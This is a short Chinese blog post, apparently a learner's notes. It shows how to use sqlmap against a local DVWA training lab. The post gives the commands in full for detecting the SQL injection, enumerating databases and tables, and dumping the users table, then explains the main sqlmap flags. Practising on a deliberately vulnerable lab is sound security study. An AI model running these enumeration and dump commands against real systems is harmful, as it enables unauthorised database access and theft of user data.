sqlmap学习(2)

尝试获取dvwa用户数据

登入dvwa,选择sql injection。在输入框内输入1,观察浏览器地址栏

20210701.7

打开终端,输入指令

sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=00vbcot006jabet0jfiut8nl75; security=low" --banner

其中,-u 后为你得到的url,注意双引号。cookie中cookie字段按你浏览器开发面板中得到的填写。

得到返回值如下

20210701.3

这就是sqlmap扫描到的注入漏洞。

接下来,尝试读取数据库中数据

//获取所有数据库
sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=00vbcot006jabet0jfiut8nl75; security=low" --dbs
//获取dvwa库中表
sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=00vbcot006jabet0jfiut8nl75; security=low" -D dvwa --tables
//获取表信息
sqlmap -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=00vbcot006jabet0jfiut8nl75; security=low" -D dvwa -T users --dump

20210701.8

成功获取所有用户信息

一些参数的含义

--users:获取所有用户

--dbs:获取所有数据库

-D:指定数据库

--tables:获取所有表

-T:指定表

--columns:获取所有字段

-C:指定字段

--dump:获取表中所有数据
 posted on 2022-10-11 22:14  SilentVver  阅读(43)  评论(0)    收藏  举报